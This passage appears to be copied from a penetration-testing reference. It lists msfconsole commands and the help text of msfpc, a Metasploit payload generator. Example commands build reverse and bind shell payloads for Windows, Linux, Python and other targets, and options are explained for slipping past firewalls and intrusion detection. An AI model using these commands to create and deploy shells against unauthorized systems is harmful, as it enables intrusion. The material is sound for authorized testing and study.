pushm Pushes the active or list of modules onto the module stack quit Exit the console reload_all Reloads all modules from all defined module paths rename_job Rename a job resource Run the commands stored in a file route Route traffic through a session save Saves the active datastores search Searches module names and descriptions sessions Dump session listings and display information about sessions set Sets a context-specific variable to a value show Displays modules of a given type, or all modules
MSF payload creator
/usr/bin/msfpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
Example: /usr/bin/msfpc windows 192.168.1.10 # Windows & manual IP.
/usr/bin/msfpc elf bind eth0 4444 # Linux, eth0’s IP & manual port.
/usr/bin/msfpc stageless cmd py https # Python, stageless command prompt.
/usr/bin/msfpc verbose loop eth1 # A payload for every type, using eth1’s IP.
/usr/bin/msfpc msf batch wan # All possible Meterpreter payloads, using WAN IP.
/usr/bin/msfpc help verbose # Help screen, with even more information.
+ Bash [.sh] + Java [.jsp] + Linux [.elf] + OSX [.macho] + Perl [.pl] + PHP
+ Powershell [.ps1] + Python [.py] + Tomcat [.war] + Windows [.exe // .dll]
Rather than putting <DOMAIN/IP>, you can do a interface and MPC will detect that IP address.
Missing <DOMAIN/IP> will default to the IP menu.
Missing <PORT> will default to 443.
<CMD> is a standard/native command prompt/terminal to interactive with.
<MSF> is a custom cross platform shell, gaining the full power of Metasploit.
Missing <CMD/MSF> will default to <MSF> where possible.
<BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
<REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
Missing <BIND/REVERSE> will default to <REVERSE>.
<STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
<STAGELESS> is the complete standalone payload. More ‘stable’ than <STAGED>.
Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
<TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
<HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol – e.g. TCP 80.
<HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol – e.g. TCP 443.
<FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to ‘allports’ based on <TYPE>.
Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
<BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
<LOOP> will just create one of each <TYPE>.
<VERBOSE> will display more information.